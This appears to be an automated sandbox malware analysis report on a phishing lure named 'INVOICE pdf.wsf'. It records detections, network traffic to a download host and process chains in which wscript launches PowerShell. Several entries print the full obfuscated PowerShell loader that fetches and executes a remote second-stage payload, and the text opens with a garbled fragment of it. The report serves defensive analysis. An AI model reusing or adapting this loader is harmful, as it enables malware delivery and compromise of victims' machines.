explaSPowdeyPres,sExcitt RosaeFo esmAllor.AfbinNScraneSpec.t Faun.AntipWKemikeBekl.bKyndeCem,lslMal xiMensteUndown S.rntM,tab ');Udslyngende (Fremtidsmuligheders ' asm$PeaseRCham oColoutDialeaViewitOverei UrtiolodgenAntiws.ongsp ,estu.ictymBordspSkatteVan

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus detection for URL or domain
          Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
          Multi AV Scanner detection for submitted file
          Source: INVOICE pdf.wsfReversingLabs: Detection: 15%
          Source: Binary string: System.Management.Automation.pdb-2476756634-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000A.00000002.4119942643.0000000008889000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Core.pdb source: powershell.exe, 0000000A.00000002.4119942643.0000000008889000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: stem.Core.pdb* source: powershell.exe, 0000000A.00000002.4119415851.0000000008820000.00000004.00000020.00020000.00000000.sdmp

          Software Vulnerabilities

          barindex
          Suspicious execution chain found
          Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

          Networking

          barindex
          Uses ping.exe to check the status of other devices and networks
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 1
          Source: global trafficHTTP traffic detected: GET /asdt/Kardinaliteter.pfb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: originalconceptsinc.ru.comConnection: Keep-Alive
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /asdt/Kardinaliteter.pfb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: originalconceptsinc.ru.comConnection: Keep-Alive
          Source: unknownDNS traffic detected: queries for: originalconceptsinc.ru.com
          Source: powershell.exe, 0000000A.00000002.4109661918.0000000007669000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
          Source: powershell.exe, 00000007.00000002.4185249372.000002449A046000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.4098203498.0000000005C7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000007.00000002.4087877267.000002448B88B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4087877267.000002448A404000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4087877267.000002448BD8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://originalconceptsinc.ru.com
          Source: powershell.exe, 00000007.00000002.4087877267.000002448A1F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://originalconceptsinc.ru.com/asdt/Kardinaliteter.pfbP
          Source: powershell.exe, 0000000A.00000002.4087319648.0000000004D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://originalconceptsinc.ru.com/asdt/Kardinaliteter.pfbXR
          Source: powershell.exe, 0000000A.00000002.4087319648.0000000004D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000007.00000002.4087877267.0000024489FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.4087319648.0000000004C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 0000000A.00000002.4087319648.0000000004D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 0000000A.00000002.4109661918.000000000771E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
          Source: powershell.exe, 00000007.00000002.4087877267.0000024489FD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: powershell.exe, 0000000A.00000002.4087319648.0000000004C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
          Source: powershell.exe, 0000000A.00000002.4098203498.0000000005C7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 0000000A.00000002.4098203498.0000000005C7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 0000000A.00000002.4098203498.0000000005C7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 0000000A.00000002.4087319648.0000000004D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000007.00000002.4087877267.000002448B1AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
          Source: powershell.exe, 00000007.00000002.4185249372.000002449A046000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.4098203498.0000000005C7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: amsi32_7984.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: Process Memory Space: powershell.exe PID: 7732, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: Process Memory Space: powershell.exe PID: 7984, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Sample has a suspicious name (potential lure to open the executable)
          Source: INVOICE pdf.wsfStatic file information: Suspicious name
          Very long command line found
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7069
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 7069
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7069Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 7069Jump to behavior
          Windows Scripting host queries suspicious COM object (likely to drop second stage)
          Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
          Wscript starts Powershell (via cmd or directly)
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Srbrns = 1;$Headling='Substrin';$Headling+='g';Function Fremtidsmuligheders($Elmiernflatable){$Uddannelsesafdelingerne=$Elmiernflatable.Length-$Srbrns;For($Elmier=5; $Elmier -lt $Uddannelsesafdelingerne; $Elmier+=(6)){$Undepreciative+=$Elmiernflatable.$Headling.Invoke($Elmier, $Srbrns);}$Undepreciative;}function Udslyngende($barm){& ($deforming) ($barm);}$Paviour=Fremtidsmuligheders ' ThemMBentjoTumulz couninonbilSo erl KonnaHelss/ Mus.5Maegl.Journ0Enlac Ci r(vesp,W MoriiPhthon AnoddKejs,oanal wDawttsEnkel EmascNSe,icT Reof Optim1Kanal0Nac o.Eviln0 Cohe;Biote restWAn,stiBagtandigam6 nse4Teleo;Exist Labox f,sk6 mas,4ukoll;Sinus Cinqur ,ntrvPtafi:Insta1H log2 Fals1 Dehu.D nsk0Photo)Konfo S,igmG KlbbeMiljicHjr,mkVievaomacro/.ring2 Rute0Tyngd1Iagtt0Twirl0Afste1Storm0Termo1Hors. SnrehFNucleiPopparYe,hoewifehfTaranoC.araxThy s/ar en1Abave2 orsi1Ikono.Dotti0Wordi ';$Presserendes=Fremtidsmuligheders ',pittUPrcissTimiaeCharmrSau.e- UtakAp ocrgItureealbifnCon,it avyt ';$Hustankes=Fremtidsmuligheders ' TephhRund tFootbtLim,sp Glyp:Respe/Regie/NegatoA.stir.ameliScurvgsammeiUngrinCheeraS,ruplFejlhcProlooDgnaanOsmogc riveFil,hpPe att Nyh,skonsoiT,iumnSuniocSmu t.Cerv.r nsinulo.us.CompucBacksoKogejmH.sge/ uswiaopsens .rked.ompltSpi e/ProjeKLevera DagsrSkraadCombiiImagon TritaBarsel SubgiForbitflocceFor.rtNeedee domiradver.OpsnupDebugfSkabeb saer ';$Agricolous=Fremtidsmuligheders '.onke>Sorts ';$deforming=Fremtidsmuligheders ',mpudiRevereGobsmxabbre ';$Befrogged = Fremtidsmuligheders 'Bas.geEtiolc PlanhParaloOlier flapp%Solsya.torip Catep D,owdSubc aBgerbtStrenaIng.n%Skiin\AsparBLikvieNebran Sta,zSengei AnthdTvangi.skarnT.lgaeSpids2Stro 3 econ3Ski d. GrosSCamoujC,terlProra Smok&Curta&Dipsa Afsjle Af uc ntomh kraoSalam Dephl$Frugt ';Udslyngende (Fremtidsmuligheders 'Panto$treergModiflCel,sokermab Kar a Bolil issa: kvalMFilmfa.niveu ilmer H,meeAric rAde onKodake Un,e= Folk(KraftcGilbemPerpedMadre lifto/ Mo ocPatho Kalkv$No,psBhappeeKanaefHalobr fnugoUnriggKlassgUn.areBygnid Fleu) Re i ');Udslyngende (Fremtidsmuligheders 'f.aar$ akshgEctoglRavinoOpr,jbangusaDe orlMaler:A mrkC.ltrahDrawaaDatelrM.rblmCo.che AarsuGrayfsNsk,beBeds rneighnNeuroe ApossIndda=U.kla$FredsHThumbuBombesPyromt P,rtaSprinnJounckBedeaeTilsysPalin.Dagmas.enoppHippalgr seiBefritJernb(Op,as$Sk,inACara.gDun erK,eolis ocucChiroo VililB.itooPi,peuOcells.ntar) Bu.c ');$Hustankes=$Charmeusernes[0];Udslyngende (Fremtidsmuligheders 'Scrof$UtopigNephrl Tan,oV.ndfb ,pomaBeakel.upli:TudbrR SelvoPyntetOverca NondtGuariiForsko Ann,n Da nsAll vp By nuBeatmmwholep B ggeZost,r.muldnDubioeContisLigul1Elect0Sto.e1 Jumi=Bar.kNBestoeSkinkw,aabe-Up.elOSkrmab Rij,j Intee PollcSpatut Cobw explaSPowdeyPres,sExcitt RosaeFo esmAllor.AfbinNScraneSpec.t Faun.AntipWKemikeBekl.bKyndeCem,lslMal xiMensteUndown S.rntM,tab ');Udslyngende (Fremtidsmuligheders ' asm$PeaseRCham oColoutDialeaViewitO
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dirJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Srbrns = 1;$Headling='Substrin';$Headling+='g';Function Fremtidsmuligheders($Elmiernflatable){$Uddannelsesafdelingerne=$Elmiernflatable.Length-$Srbrns;For($Elmier=5; $Elmier -lt $Uddannelsesafdelingerne; $Elmier+=(6)){$Undepreciative+=$Elmiernflatable.$Headling.Invoke($Elmier, $Srbrns);}$Undepreciative;}function Udslyngende($barm){& ($deforming) ($barm);}$Paviour=Fremtidsmuligheders ' ThemMBentjoTumulz couninonbilSo erl KonnaHelss/ Mus.5Maegl.Journ0Enlac Ci r(vesp,W MoriiPhthon AnoddKejs,oanal wDawttsEnkel EmascNSe,icT Reof Optim1Kanal0Nac o.Eviln0 Cohe;Biote restWAn,stiBagtandigam6 nse4Teleo;Exist Labox f,sk6 mas,4ukoll;Sinus Cinqur ,ntrvPtafi:Insta1H log2 Fals1 Dehu.D nsk0Photo)Konfo S,igmG KlbbeMiljicHjr,mkVievaomacro/.ring2 Rute0Tyngd1Iagtt0Twirl0Afste1Storm0Termo1Hors. SnrehFNucleiPopparYe,hoewifehfTaranoC.araxThy s/ar en1Abave2 orsi1Ikono.Dotti0Wordi ';$Presserendes=Fremtidsmuligheders ',pittUPrcissTimiaeCharmrSau.e- UtakAp ocrgItureealbifnCon,it avyt ';$Hustankes=Fremtidsmuligheders ' TephhRund tFootbtLim,sp Glyp:Respe/Regie/NegatoA.stir.ameliScurvgsammeiUngrinCheeraS,ruplFejlhcProlooDgnaanOsmogc riveFil,hpPe att Nyh,skonsoiT,iumnSuniocSmu t.Cerv.r nsinulo.us.CompucBacksoKogejmH.sge/ uswiaopsens .rked.ompltSpi e/ProjeKLevera DagsrSkraadCombiiImagon TritaBarsel SubgiForbitflocceFor.rtNeedee domiradver.OpsnupDebugfSkabeb saer ';$Agricolous=Fremtidsmuligheders '.onke>Sorts ';$deforming=Fremtidsmuligheders ',mpudiRevereGobsmxabbre ';$Befrogged = Fremtidsmuligheders 'Bas.geEtiolc PlanhParaloOlier flapp%Solsya.torip Catep D,owdSubc aBgerbtStrenaIng.n%Skiin\AsparBLikvieNebran Sta,zSengei AnthdTvangi.skarnT.lgaeSpids2Stro 3 econ3Ski d. GrosSCamoujC,terlProra Smok&Curta&Dipsa Afsjle Af uc ntomh kraoSalam Dephl$Frugt ';Udslyngende (Fremtidsmuligheders 'Panto$treergModiflCel,sokermab Kar a Bolil issa: kvalMFilmfa.niveu ilmer H,meeAric rAde onKodake Un,e= Folk(KraftcGilbemPerpedMadre lifto/ Mo ocPatho Kalkv$No,psBhappeeKanaefHalobr fnugoUnriggKlassgUn.areBygnid Fleu) Re i ');Udslyngende (Fremtidsmuligheders 'f.aar$ akshgEctoglRavinoOpr,jbangusaDe orlMaler:A mrkC.ltrahDrawaaDatelrM.rblmCo.che AarsuGrayfsNsk,beBeds rneighnNeuroe ApossIndda=U.kla$FredsHThumbuBombesPyromt P,rtaSprinnJounckBedeaeTilsysPalin.Dagmas.enoppHippalgr seiBefritJernb(Op,as$Sk,inACara.gDun erK,eolis ocucChiroo VililB.itooPi,peuOcells.ntar) Bu.c ');$Hustankes=$Charmeusernes[0];Udslyngende (Fremtidsmuligheders 'Scrof$UtopigNephrl Tan,oV.ndfb ,pomaBeakel.upli:TudbrR SelvoPyntetOverca NondtGuariiForsko Ann,n Da nsAll vp By nuBeatmmwholep B ggeZost,r.muldnDubioeContisLigul1Elect0Sto.e1 Jumi=Bar.kNBestoeSkinkw,aabe-Up.elOSkrmab Rij,j Intee PollcSpatut Cobw explaSPowdeyPres,sExcitt RosaeFo esmAllor.AfbinNScraneSpec.t Faun.AntipWKemikeBekl.bKyndeCem,lslMal xiMensteUndown S.rntM,tab ');Udslyngende (Fremtidsmuligheders ' asm$PeaseRCham oColoutDialeaViewitOJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B89BF527_2_00007FFD9B89BF52
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B89B1A67_2_00007FFD9B89B1A6
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04B2F25010_2_04B2F250
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04B2FB2010_2_04B2FB20
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04B2EF0810_2_04B2EF08
          Source: INVOICE pdf.wsfInitial sample: Strings found which are bigger than 50
          Source: amsi32_7984.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: Process Memory Space: powershell.exe PID: 7732, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: Process Memory Space: powershell.exe PID: 7984, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: classification engineClassification label: mal100.troj.expl.evad.winWSF@19/6@1/2
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Benzidine233.SjlJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7740:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7672:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7612:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7544:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pd5wkpoa.2hz.ps1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7732
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7984
          Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: INVOICE pdf.wsfReversingLabs: Detection: 15%
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INVOICE pdf.wsf"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 1
          Source: C:\Windows\System32\PING.EXEProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping %.%.%.%
          Source: C:\Windows\System32\PING.EXEProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Srbrns = 1;$Headling='Substrin';$Headling+='g';Function Fremtidsmuligheders($Elmiernflatable){$Uddannelsesafdelingerne=$Elmiernflatable.Length-$Srbrns;For($Elmier=5; $Elmier -lt $Uddannelsesafdelingerne; $Elmier+=(6)){$Undepreciative+=$Elmiernflatable.$Headling.Invoke($Elmier, $Srbrns);}$Undepreciative;}function Udslyngende($barm){& ($deforming) ($barm);}$Paviour=Fremtidsmuligheders ' ThemMBentjoTumulz couninonbilSo erl KonnaHelss/ Mus.5Maegl.Journ0Enlac Ci r(vesp,W MoriiPhthon AnoddKejs,oanal wDawttsEnkel EmascNSe,icT Reof Optim1Kanal0Nac o.Eviln0 Cohe;Biote restWAn,stiBagtandigam6 nse4Teleo;Exist Labox f,sk6 mas,4ukoll;Sinus Cinqur ,ntrvPtafi:Insta1H log2 Fals1 Dehu.D nsk0Photo)Konfo S,igmG KlbbeMiljicHjr,mkVievaomacro/.ring2 Rute0Tyngd1Iagtt0Twirl0Afste1Storm0Termo1Hors. SnrehFNucleiPopparYe,hoewifehfTaranoC.araxThy s/ar en1Abave2 orsi1Ikono.Dotti0Wordi ';$Presserendes=Fremtidsmuligheders ',pittUPrcissTimiaeCharmrSau.e- UtakAp ocrgItureealbifnCon,it avyt ';$Hustankes=Fremtidsmuligheders ' TephhRund tFootbtLim,sp Glyp:Respe/Regie/NegatoA.stir.ameliScurvgsammeiUngrinCheeraS,ruplFejlhcProlooDgnaanOsmogc riveFil,hpPe att Nyh,skonsoiT,iumnSuniocSmu t.Cerv.r nsinulo.us.CompucBacksoKogejmH.sge/ uswiaopsens .rked.ompltSpi e/ProjeKLevera DagsrSkraadCombiiImagon TritaBarsel SubgiForbitflocceFor.rtNeedee domiradver.OpsnupDebugfSkabeb saer ';$Agricolous=Fremtidsmuligheders '.onke>Sorts ';$deforming=Fremtidsmuligheders ',mpudiRevereGobsmxabbre ';$Befrogged = Fremtidsmuligheders 'Bas.geEtiolc PlanhParaloOlier flapp%Solsya.torip Catep D,owdSubc aBgerbtStrenaIng.n%Skiin\AsparBLikvieNebran Sta,zSengei AnthdTvangi.skarnT.lgaeSpids2Stro 3 econ3Ski d. GrosSCamoujC,terlProra Smok&Curta&Dipsa Afsjle Af uc ntomh kraoSalam Dephl$Frugt ';Udslyngende (Fremtidsmuligheders 'Panto$treergModiflCel,sokermab Kar a Bolil issa: kvalMFilmfa.niveu ilmer H,meeAric rAde onKodake Un,e= Folk(KraftcGilbemPerpedMadre lifto/ Mo ocPatho Kalkv$No,psBhappeeKanaefHalobr fnugoUnriggKlassgUn.areBygnid Fleu) Re i ');Udslyngende (Fremtidsmuligheders 'f.aar$ akshgEctoglRavinoOpr,jbangusaDe orlMaler:A mrkC.ltrahDrawaaDatelrM.rblmCo.che AarsuGrayfsNsk,beBeds rneighnNeuroe ApossIndda=U.kla$FredsHThumbuBombesPyromt P,rtaSprinnJounckBedeaeTilsysPalin.Dagmas.enoppHippalgr seiBefritJernb(Op,as$Sk,inACara.gDun erK,eolis ocucChiroo VililB.itooPi,peuOcells.ntar) Bu.c ');$Hustankes=$Charmeusernes[0];Udslyngende (Fremtidsmuligheders 'Scrof$UtopigNephrl Tan,oV.ndfb ,pomaBeakel.upli:TudbrR SelvoPyntetOverca NondtGuariiForsko Ann,n Da nsAll vp By nuBeatmmwholep B ggeZost,r.muldnDubioeContisLigul1Elect0Sto.e1 Jumi=Bar.kNBestoeSkinkw,aabe-Up.elOSkrmab Rij,j Intee PollcSpatut Cobw explaSPowdeyPres,sExcitt RosaeFo esmAllor.AfbinNScraneSpec.t Faun.AntipWKemikeBekl.bKyndeCem,lslMal xiMensteUndown S.rntM,tab ');Udslyngende (Fremtidsmuligheders ' asm$PeaseRCham oColoutDialeaViewitO
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Benzidine233.Sjl && echo $"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Srbrns = 1;$Headling='Substrin';$Headling+='g';Function Fremtidsmuligheders($Elmiernflatable){$Uddannelsesafdelingerne=$Elmiernflatable.Length-$Srbrns;For($Elmier=5; $Elmier -lt $Uddannelsesafdelingerne; $Elmier+=(6)){$Undepreciative+=$Elmiernflatable.$Headling.Invoke($Elmier, $Srbrns);}$Undepreciative;}function Udslyngende($barm){& ($deforming) ($barm);}$Paviour=Fremtidsmuligheders ' ThemMBentjoTumulz couninonbilSo erl KonnaHelss/ Mus.5Maegl.Journ0Enlac Ci r(vesp,W MoriiPhthon AnoddKejs,oanal wDawttsEnkel EmascNSe,icT Reof Optim1Kanal0Nac o.Eviln0 Cohe;Biote restWAn,stiBagtandigam6 nse4Teleo;Exist Labox f,sk6 mas,4ukoll;Sinus Cinqur ,ntrvPtafi:Insta1H log2 Fals1 Dehu.D nsk0Photo)Konfo S,igmG KlbbeMiljicHjr,mkVievaomacro/.ring2 Rute0Tyngd1Iagtt0Twirl0Afste1Storm0Termo1Hors. SnrehFNucleiPopparYe,hoewifehfTaranoC.araxThy s/ar en1Abave2 orsi1Ikono.Dotti0Wordi ';$Presserendes=Fremtidsmuligheders ',pittUPrcissTimiaeCharmrSau.e- UtakAp ocrgItureealbifnCon,it avyt ';$Hustankes=Fremtidsmuligheders ' TephhRund tFootbtLim,sp Glyp:Respe/Regie/NegatoA.stir.ameliScurvgsammeiUngrinCheeraS,ruplFejlhcProlooDgnaanOsmogc riveFil,hpPe att Nyh,skonsoiT,iumnSuniocSmu t.Cerv.r nsinulo.us.CompucBacksoKogejmH.sge/ uswiaopsens .rked.ompltSpi e/ProjeKLevera DagsrSkraadCombiiImagon TritaBarsel SubgiForbitflocceFor.rtNeedee domiradver.OpsnupDebugfSkabeb saer ';$Agricolous=Fremtidsmuligheders '.onke>Sorts ';$deforming=Fremtidsmuligheders ',mpudiRevereGobsmxabbre ';$Befrogged = Fremtidsmuligheders 'Bas.geEtiolc PlanhParaloOlier flapp%Solsya.torip Catep D,owdSubc aBgerbtStrenaIng.n%Skiin\AsparBLikvieNebran Sta,zSengei AnthdTvangi.skarnT.lgaeSpids2Stro 3 econ3Ski d. GrosSCamoujC,terlProra Smok&Curta&Dipsa Afsjle Af uc ntomh kraoSalam Dephl$Frugt ';Udslyngende (Fremtidsmuligheders 'Panto$treergModiflCel,sokermab Kar a Bolil issa: kvalMFilmfa.niveu ilmer H,meeAric rAde onKodake Un,e= Folk(KraftcGilbemPerpedMadre lifto/ Mo ocPatho Kalkv$No,psBhappeeKanaefHalobr fnugoUnriggKlassgUn.areBygnid Fleu) Re i ');Udslyngende (Fremtidsmuligheders 'f.aar$ akshgEctoglRavinoOpr,jbangusaDe orlMaler:A mrkC.ltrahDrawaaDatelrM.rblmCo.che AarsuGrayfsNsk,beBeds rneighnNeuroe ApossIndda=U.kla$FredsHThumbuBombesPyromt P,rtaSprinnJounckBedeaeTilsysPalin.Dagmas.enoppHippalgr seiBefritJernb(Op,as$Sk,inACara.gDun erK,eolis ocucChiroo VililB.itooPi,peuOcells.ntar) Bu.c ');$Hustankes=$Charmeusernes[0];Udslyngende (Fremtidsmuligheders 'Scrof$UtopigNephrl Tan,oV.ndfb ,pomaBeakel.upli:TudbrR SelvoPyntetOverca NondtGuariiForsko Ann,n Da nsAll vp By nuBeatmmwholep B ggeZost,r.muldnDubioeContisLigul1Elect0Sto.e1 Jumi=Bar.kNBestoeSkinkw,aabe-Up.elOSkrmab Rij,j Intee PollcSpatut Cobw explaSPowdeyPres,sExcitt RosaeFo esmAllor.AfbinNScraneSpec.t Faun.AntipWKemikeBekl.bKyndeCem,lslMal xiMensteUndown S.rntM,tab ');Udslyngende (Fremtidsmuligheders ' asm$PeaseRCham oColoutDialeaViewitO
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Benzidine233.Sjl && echo $"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 1Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping %.%.%.%Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dirJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Srbrns = 1;$Headling='Substrin';$Headling+='g';Function Fremtidsmuligheders($Elmiernflatable){$Uddannelsesafdelingerne=$Elmiernflatable.Length-$Srbrns;For($Elmier=5; $Elmier -lt $Uddannelsesafdelingerne; $Elmier+=(6)){$Undepreciative+=$Elmiernflatable.$Headling.Invoke($Elmier, $Srbrns);}$Undepreciative;}function Udslyngende($barm){& ($deforming) ($barm);}$Paviour=Fremtidsmuligheders ' ThemMBentjoTumulz couninonbilSo erl KonnaHelss/ Mus.5Maegl.Journ0Enlac Ci r(vesp,W MoriiPhthon AnoddKejs,oanal wDawttsEnkel EmascNSe,icT Reof Optim1Kanal0Nac o.Eviln0 Cohe;Biote restWAn,stiBagtandigam6 nse4Teleo;Exist Labox f,sk6 mas,4ukoll;Sinus Cinqur ,ntrvPtafi:Insta1H log2 Fals1 Dehu.D nsk0Photo)Konfo S,igmG KlbbeMiljicHjr,mkVievaomacro/.ring2 Rute0Tyngd1Iagtt0Twirl0Afste1Storm0Termo1Hors. SnrehFNucleiPopparYe,hoewifehfTaranoC.araxThy s/ar en1Abave2 orsi1Ikono.Dotti0Wordi ';$Presserendes=Fremtidsmuligheders ',pittUPrcissTimiaeCharmrSau.e- UtakAp ocrgItureealbifnCon,it avyt ';$Hustankes=Fremtidsmuligheders ' TephhRund tFootbtLim,sp Glyp:Respe/Regie/NegatoA.stir.ameliScurvgsammeiUngrinCheeraS,ruplFejlhcProlooDgnaanOsmogc riveFil,hpPe att Nyh,skonsoiT,iumnSuniocSmu t.Cerv.r nsinulo.us.CompucBacksoKogejmH.sge/ uswiaopsens .rked.ompltSpi e/ProjeKLevera 